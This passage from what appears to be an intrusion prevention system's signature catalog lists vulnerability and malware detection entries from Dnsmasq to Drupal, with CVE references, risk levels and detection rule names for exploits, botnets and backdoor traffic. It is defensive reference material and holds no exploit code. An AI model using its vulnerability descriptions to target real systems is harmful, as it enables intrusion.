Situation: DNS-UDP_Dnsmasq-Sort_rrset-CVE-2020-25687-Out-Of-Bounds-Write
References:
CVE-2020-25687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25687
Back to top

Dnsmasq-TFTP-Service-Remote-Heap-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Dnsmasq
Risk: Moderate
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Simon Kelly Dnsmasq
Type: Buffer Overflow
Description: Dnsmasq has a heap based buffer overflow vulnerability due to improper bounds checking when handling TFTP read requests. A successful exploit leads to a denial of service condition or arbitrary code execution within the security context of the affected service.
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
References:
CVE-2009-2957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2957
BID-36121
http://www.securityfocus.com/bid/36121
OSVDB-57592
http://www.osvdb.org/57592
Back to top

DoblePulsar-PeddleCheap-Implant-Traffic

About this vulnerability: Malware C&C traffic
Risk: Moderate
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Post Compromise Behaviour
Description: Command and control traffic of the DoublePulsar DanderSpritz implant.
Situation: Generic_SS-DoblePulsar-PeddleCheap-Implant-Traffic
File-Binary_DoblePulsar-PeddleCheap-Implant-Traffic
Back to top

Docker-Daemon-Unprotected-TCP-Socket-Exploit

About this vulnerability: A Docker Daemon Unprotected TCP Socket Exploit vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Docker
Type: Input Validation
Description: A vulnerability in Docker which allows remote attackers to create a Docker container with the '/' path mounted with read/write permissions on the host server, via tcp sockets tcp/2375 and tcp/2376.
Situation: HTTP_CRL-Docker-Daemon-Unprotected-TCP-Socket-Exploit
Back to top

Docpile-Init-Path-Parameter-Remote-File-Inclusion

About this vulnerability: A file inclusion vulnerability in docpile:we
Risk: High
First detected in: sgpkg-ips-160-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: docpile:we
Type: PHP Injection
Description: There is a file inclusion vulnerability in docpile:we, a web-based document management application. Multiple components of the application allow inclusion of arbitrary files, which may lead to an arbitrary code execution in the context of the web server.
Situation: HTTP_CSU-Docpile-Init-Path-Parameter-Remote-File-Inclusion
References:
CVE-2006-4075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4075
BID-19428
http://www.securityfocus.com/bid/19428
OSVDB-27862
http://www.osvdb.org/27862
OSVDB-27859
http://www.osvdb.org/27859
OSVDB-27860
http://www.osvdb.org/27860
OSVDB-27861
http://www.osvdb.org/27861
Back to top

Dogfood-CRM-Remote-Command-Execution

About this vulnerability: A Dogfood CRM Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dogfood CRM
Type: Input Validation
Description: A vulnerability in Dogfood CRM, version 2.0.10, that allows remote attackers to execute arbitrary commands in the spell check feature.
Situation: HTTP_CRL-Dogfood-CRM-Remote-Command-Execution
References:
OSVDB-54707
http://www.osvdb.org/54707
Back to top

Dolibarr-16-Pre-Auth-Contact-Database-Dump

About this vulnerability: An attempt to exploit a vulnerability in Dolibarr detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Dolibarr
Type: Insecure Configuration
Description: A vulnerability in Dolibarr, versions prior to 16.0.5, which allows unauthenticated remote attackers to retreive a company's customer and employee information by a contact dump via getContact using the % character in the email parameter.
Situation: HTTP_CRL-Dolibarr-16-Pre-Auth-Contact-Database-Dump
Back to top

Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: Moderate
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: Insufficient sanitization of the facid request parameter causes a cross-site scripting vulnerability in Dolibarr ERP and CRM. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting
References:
CVE-2024-34051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34051
Back to top

Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: Moderate
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: A command injection vulnerability has been reported for Dolibarr ERP/CRM. The vulnerability is due to insufficient user input validation in the functions dol_sanitizeFileName() and dol_sanitizePathName(). A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in command execution under the security context of the PHP interpreter.
Situation: HTTP_CRL-Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection
References:
CVE-2023-38886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38886
Back to top

Dolibarr-ERP-And-CRM-Edit.php-Code-Injection

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: A code injection vulnerability has been reported in Dolibarr ERP and CRM. The vulnerability is due to insufficient sanitization of parameters. A remote attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in remote code execution on the target server.
Situation: HTTP_CRL-Dolibarr-ERP-And-CRM-Edit.php-Code-Injection
References:
CVE-2022-40871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40871
Back to top

Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: Moderate
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: Improper input validation on user-provided data in the dol_Eval fucntion of the Menu editor module of Dolibarr causes a code injection vulnerability which allows a remote attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection
References:
CVE-2022-0819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0819
Back to top

Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1498-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: There exists a command injection vulnerability in Dolibarr ERP/CRM. Successful exploitation could lead in arbitrary command injection on the target server.
Situation: HTTP_CS-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
References:
CVE-2021-33816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33816
Back to top

Dolibarr-ERP-CRM-Command-Injection

About this vulnerability: A Dolibarr ERP CRM Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Dolibarr
Type: Input Validation
Description: A vulnerability in Dolibarr ERP & CRM, versions 3.2.0 and before, which allows remote attackers to execute arbitrary system commands through the sql_compat parameter due to lack of proper input validation.
Situation: HTTP_CRL-Dolibarr-ERP-CRM-Command-Injection
References:
OSVDB-80980
http://www.osvdb.org/80980
Back to top

Dolibarr-ERP-CRM-SQL-Injection

About this vulnerability: A vulnerability in Dolibarr
Risk: High
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dolibarr
Type: SQL Injection
Description: A vulnerability in Dolibarr which allows remote attackers to obtain usernames and encrypted passwords using an SQL injection.
Situation: HTTP_CSU-Dolibarr-ERP-CRM-SQL-Injection
References:
CVE-2018-10094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10094
Back to top

Dolibarr-ERP-Group-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Dolibarr ERP and CRM Suite
Risk: Moderate
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: Dolibarr
Type: Input Validation
Description: Insufficient sanitization of user-supplied data during group creation in the group module of Dolibarr ERP and CRM Suite causes a cross-site scripting vulnerability that allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Dolibarr-ERP-Group-Stored-Cross-Site-Scripting
References:
CVE-2021-33618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33618
Back to top

Donbot-Bot

About this vulnerability: Donbot Bot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Donbot is a Botnet that is used to send e-mail spam.
Situation: HTTP_CRL-Donbot-Bot-Activity-Detected
Back to top

Donbot-Spambot

About this vulnerability: Donbot spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Donbot spambot
Type: Backdoor
Description: Donbot spambot is a template-based spamming engine.
Situation: Generic_CS-Donbot-Spambot
Back to top

Dopewars-Denial-of-Service

About this vulnerability: A Dopewars Denial of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dopewars
Type: Input Validation
Description: A vulnerability in Dopewars version 1.5.12 which allows remote attackers to cause a denial of service condition by sending a REQUESTJET message with an invalid location.
Situation: Generic_CS-Dopewars-Denial-of-Service
References:
CVE-2009-3591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3591
BID-36606
http://www.securityfocus.com/bid/36606
OSVDB-58884
http://www.osvdb.org/58884
Back to top

Dorkbot-Botnet

About this vulnerability: Dorkbot botnet
Risk: High
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Dorkbot is an IRC-based malicious botnet. Dorkbot is a malware dropper and has been observed to download malicious executables that steal login information. However, Dorkbot may download any arbitrary malicious executable at any time and imposes a high security risk.
Situation: Generic_CS-Dorkbot-Traffic
Back to top

Dotcms-Cmsfilter-Assets-Access-Control-Weakness

About this vulnerability: A vulnerability in dotCMS dotCMS
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: dotCMS
Type: Malfunction
Description: Insufficient path validation in the CMSFilter class causes an access control vulnerability in dotCMS. A successful exploit allows an attacker to bypass access restrictions and possibly execute code on the target system.
Situation: HTTP_CSU-Dotcms-Cmsfilter-Assets-Access-Control-Weakness
References:
CVE-2020-6754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6754
Back to top

Dotcms-RCE-Via-Arbitrary-File-Upload

About this vulnerability: A vulnerability in dotCMS.
Risk: High
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Platform: Windows; Linux
Software: dotCMS
Type: Input Validation
Description: A vulnerability in dotCMS which allows remote attackers to execute arbitrary code byt sending a crafted POST request to /api/content/, due to the lack of filename validation.
Situation: HTTP_CS-Dotcms-RCE-Via-Arbitrary-File-Upload
References:
CVE-2022-26352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352
Back to top

DotNetNuke-Cookie-Deserialization-RCE

About this vulnerability: A vulnerability in DotNetNuke.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Windows
Software: DotNetNuke
Type: Input Validation
Description: A vulnerability in DotNetNuke, versions 5.0.0 to 9.3.0-RC, which allows remote attackers to execute arbitrary code throught the "type" attribute within the Cookie header.
Situation: HTTP_CSH-DotNetNuke-Cookie-Deserialization-RCE
References:
CVE-2017-9822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9822
Back to top

Double-Encoding-Usage-In-URI

About this vulnerability: Double encoding attack technique detected
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: This fingerprint detects the usage of double encoding attack technique (e.g., "%2561"). It could be used to bypass security filters that only decode user input once. The second decoding process is executed by the backend platform or modules that properly handle encoded data, but do not have the corresponding security checks in place.
Situation: HTTP_CSU-Double-Encoding-Usage
Back to top

DoublePulsar-Backdoor

About this vulnerability: DoublePulsar Backdoor
Risk: High
First detected in: sgpkg-ips-911-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: DoublePulsar is a backdoor originally developed by NSA and leaked by The Shadow Brokers.
Situation: SMB-TCP_CS-Trans2-DoublePulsar-Request
SMB-TCP_SS-Trans2-DoublePulsar-Response
Back to top

Dovecot-And-Pigeonhole-Remote-Code-Execution

About this vulnerability: A vulnerability in Dovecot
Risk: Moderate
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dovecot
Type: Malfunction
Description: Improper handling of NUL bytes in quoted strings causes a remote code execution vulnerability in Dovecot and Pigeonhole IMAP and ManageSieve protocol parsers. A successful exploit may allow an attacker to run arbitrary code on the target.
Situation: IMAP_CS-Dovecot-And-Pigeonhole-Remote-Code-Execution
References:
CVE-2019-11500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11500
Back to top

Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Dovecot Dovecot
Risk: Moderate
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dovecot
Type: Malfunction
Description: Improper parsing of SMTP causes an out-of-bounds read vulnerability in Dovecot. A successful exploit may lead to information disclosure or a denial of service condition.
Situation: SMTP_CS-Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read
References:
CVE-2017-14461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14461
Back to top

Dovecot-SASL-Authentication-Component-Denial-Of-Service

About this vulnerability: A vulnerability in Dovecot Dovecot
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dovecot
Type: Malfunction
Description: The SASL authentication component of Dovecot has a vulnerability which can be exploited to cause a denial of service condition.
Situation: SMTP_Dovecot-SASL-Authentication-Component-Denial-Of-Service
IMAP_Dovecot-SASL-Authentication-Component-Denial-Of-Service
POP3_Dovecot-SASL-Authentication-Component-Denial-Of-Service
References:
CVE-2016-8652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8652
Back to top

Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS

About this vulnerability: A vulnerability in Dovecot
Risk: High
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dovecot
Type: Infinite Loop
Description: There exists a vulnerability in the Dovecot server, versions 2.3.9 and before, which allows remote attackers to cause a denial of service condition by sending a malicious request, due to infinite loop in the submission-login and lmtp components when processing truncated command parameters.
Situation: SMTP_CS-Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS
References:
CVE-2020-7046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7046
Back to top

Dovecot-Submission-Login-Service-Auth-DoS

About this vulnerability: A vulnerability in Dovecot Submission-Login Service
Risk: High
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dovecot
Type: Malfunction
Description: A vulnerability in Dovecot which allows remote attackers to cause the Dovecot submission-login process to abnormally terminate by repeatedly sending malicious requests to the target server.
Situation: SMTP_CS-Dovecot-Submission-Login-Service-Auth-DoS
References:
CVE-2019-11499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11499
Back to top

Downandup-Worm-Request

About this vulnerability: Request generated by W32/Downadnup worm
Risk: High
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: The W32/Downandup worm that automatically exploits systems and reports its status to a set of generated domains after it has infected a host. Presence of these requests indicate that there are infected systems in the network.
Situation: HTTP_CS-Conficker-Worm-Request
MSRPC-TCP_CPS-Conficker-Worm-ShellCode
Back to top

Downloader-Malware

About this vulnerability: Downloader malware
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Any Software
Type: Post Compromise Behaviour
Description: Downloader malware is a post exploitation tool that is used to download additional components such as backdoors to a compromised system.
Situation: HTTP_SS-Downloader-Malware
File-Text_Downloader-Malware
Back to top

Downloader-Malware-Infection-Traffic

About this vulnerability: Downloader malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Downloader malware infection traffic (similar to OSTAP) was detected.
Situation: HTTP_CRL-Downloader-Malware-Infection-Traffic
Back to top

DrayTek-Vigor-Command-Execution-CVE-2020-15415

About this vulnerability: A vulnerability in DrayTek Vigor
Risk: High
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Platform: Generic
Software: DrayTek Vigor
Type: Input Validation
Description: A pre-authenticated command injection vulnerability has been reported in the DrayTek Vigor3900, Vigor2960, and Vigor300B firmware versions before 1.5.1.1.
Situation: HTTP_CS-DrayTek-Vigor-Command-Execution-CVE-2020-15415
References:
CVE-2020-15415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15415
Back to top

DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123

About this vulnerability: A vulnerability in DrayTek VigorConnect
Risk: High
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Platform: Linux; Windows
Software: DrayTek Vigor
Type: Directory Traversal
Description: A local file inclusion vulnerability exists in the DownloadFileServlet component of DrayTek VigorConnect 1.6.0-B3. Successfully exploiting this vulnerability allows an unauthenticated attacker to download arbitrary system files, leading into the disclosure of sensitive information such as passwords.
Situation: HTTP_CSU-DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20123
References:
CVE-2021-20123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20123
Back to top

DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20124

About this vulnerability: A vulnerability in DrayTek Vigor
Risk: High
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1831-5242
Platform: Generic
Software: DrayTek Vigor
Type: Directory Traversal
Description: A local file inclusion vulnerability exists in the WebServlet component of DrayTek VigorConnect 1.6.0-B3. Successfully exploiting this vulnerability allows an unauthenticated attacker to download arbitrary system files, leading into the disclosure of sensitive information such as passwords.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2021-20124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20124
Back to top

DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection

About this vulnerability: A vulnerability in DrayTek Vigor
Risk: High
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DrayTek Vigor
Type: Input Validation
Description: A vulnerability in DrayTek Vigor2960, Vigor3900, and Vigor300B, which allows remote attackers to execute arbitrary code due to insufficient user input validation of the keyPath parameter.
Situation: HTTP_CRL-DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection
References:
CVE-2020-8515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8515
Back to top

Dreamloader-Bot

About this vulnerability: Dreamloader Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Dreamloader is a bot that opens a backdoor on the infected machine for a remote attacker to use.
Situation: HTTP_CS-Dreamloader-Bot-Traffic
HTTP_CSH-Dreamloader-Bot-Traffic
Back to top

Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: An information disclosure vulnerability has been discovered in Drupal Core. The vulnerability is due to an input validation error when handles a malicious OpenID response. It can be exploited by a remote attacker to read files on the local filesystem by using a malicious OpenID server.
Situation: File-TextId_Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure
References:
CVE-2012-4554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4554
BID-56103
http://www.securityfocus.com/bid/56103
OSVDB-86429
http://www.osvdb.org/86429
Back to top

Dropbox-Lan-Sync-Discovery-Protocol-Usage

About this vulnerability: Dropbox Lan Sync discovery protocol message detected
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dropbox
Type: Peer-to-Peer
Description: Dropbox LAN sync discovery protocol messages detected. This protocol is used to distribute peer contact information for Dropbox hosts.
Situation: P2P-UDP_Dropbox-Lan-Sync-Discovery-Protocol-Usage
Back to top

Drovorub-Malware

About this vulnerability: Drovorub Malware
Risk: High
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Remote Control
Description: Drovorub is a Linux malware toolset. When the Drovorub client has been implanted on the target machine, a remote attacker can use the client to download and upload files, execute code as root, and forward traffic to other hosts on the network.
Situation: WebSocket_CS-Drovorub-Malware-C2-Communication
WebSocket_SS-Drovorub-Malware-C2-Communication
Back to top

Drupal-Coder-Module-Coder_upgrade.run.php-Remote-Code-Execution

About this vulnerability: A vulnerability in Drupal Coder
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: Improper validation of client data causes a vulnerability which can be exploited to gain the ability to run arbitrary code on the target system.
Situation: HTTP_CSU-Drupal-Coder-Module-Coder_upgrade.run-Remote-Code-Execution
Back to top

Drupal-Core-Database-Expandarguments-SQL-Injection

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: SQL Injection
Description: A SQL injection vulnerability has been found in Drupal Core. The vulnerability is due to insufficient validation of user-supplied data when expanding argument values used in SQL queries. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted parameter to a Drupal Core server. Successful exploitation could lead to arbitrary code execution under the security context of the server.
Situation: HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-3
HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-2
References:
CVE-2014-3704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
BID-70595
http://www.securityfocus.com/bid/70595
OSVDB-113371
http://www.osvdb.org/113371
Back to top

Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Drupal Core
Risk: Moderate
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: Improper handling of file names of file uploads causes a cross-site scripting vulnerability in Drupal. A successful exploit may allow an attacker to run arbitrary scripts in the browser of a user using the affected Drupal instance.
Situation: HTTP_CS-Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting
References:
CVE-2019-6341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6341
Back to top

Drupal-Core-Form-Rendering-Remote-Code-Execution

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: Improper validation of HTTP request data causes a remote code execution vulnerability in Drupal. A successful exploit allows an attacker to execute arbitrary code with the privileges of the server process.
Situation: HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution
HTTP_CRL-Drupalgeddon2-Post-Parameter
References:
CVE-2018-7600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
Back to top

Drupal-Core-Form-Rendering-Remote-Code-Execution-2

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: Improper validation of user-supplied data causes a remote code execution vulnerability in Drupal. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution-2
References:
CVE-2018-7602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7602
Back to top

Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization

About this vulnerability: A vulnerability in Drupal Core
Risk: Moderate
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Drupal Core. This vulnerability can be remotely exploited. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization
References:
CVE-2019-6339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6339
Back to top

Drupal-Core-Remote-Code-Execution-CVE-2019-6340

About this vulnerability: A vulnerability in Drupal
Risk: High
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in Drupal's core. Successful exploitation could lead in remote code execution on the target server.
Situation: HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340
References:
CVE-2019-6340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340
Back to top

Drupal-Core-System.Temporary-Information-Disclosure

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Malfunction
Description: Insufficient access control in Drupal allows an attacker to download the full configuration from the system. The vulnerability is dependent on the user account settings, making legitimate downloads of the configuration data indistinguishable from malicious downloads. This detects all such downloads.
Situation: HTTP_CRL-Drupal-Core-System.Temporary-Information-Disclosure
References:
CVE-2016-7572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7572
Back to top

Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340

About this vulnerability: A vulnerability in Drupal Core
Risk: High
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: A vulnerability in Drupal Core, versions 7.x, 8.5.x prior to 8.5.11, and 8.6.x prior to 8.6.10, which allows remote attackers to execute arbitrary code due to the insufficient sanitization of the data for certain Field Types from non-form sources prior to deserialization.
Situation: HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340
References:
CVE-2019-6340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340
Back to top

Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service

About this vulnerability: A vulnerability in Drupal Drupal
Risk: Moderate
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: A denial of service vulnerability has been reported in Drupal Core. The vulnerability is due to an input validation error when an XML-RPC endpoint xmlrpc.php handles Internal Entity Expansion. This can cause a very high CPU load and memory exhaustion. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service on the vulnerable system.
Situation: HTTP_CS-Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service
References:
CVE-2014-5265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5265
OSVDB-109867
http://www.osvdb.org/109867
Back to top

Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service

About this vulnerability: A vulnerability in Drupal Drupal
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Input Validation
Description: A denial of service vulnerability has been reported in Drupal Core. The vulnerability is due to an input validation error when XML-RPC endpoint xmlrpc.php handles an unreasonably large number of tags, which can cause a very high CPU load and memory exhaustion. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service on the vulnerable system.
Situation: File-TextId_Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service
References:
CVE-2014-5266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5266
OSVDB-109867
http://www.osvdb.org/109867
Back to top

Drupal-Drupalgeddon-2-Forms-API-Property-Injection

About this vulnerability: A Drupal Drupalgeddon 2 Forms API Property Injection
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Drupal
Type: Input Validation
Description: A vulnerability in Drupal, versions 7.x and 8.x, which allows remote attackers to execute arbitrary code through multiple subsystems.
Situation: HTTP_CRL-Drupal-Drupalgeddon-2-Forms-API-Property-Injection
References:
CVE-2018-7600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
Back to top

Drupal-Restws-Module-Page-Callback-Remote-Code-Execution

About this vulnerability: A vulnerability in Drupal
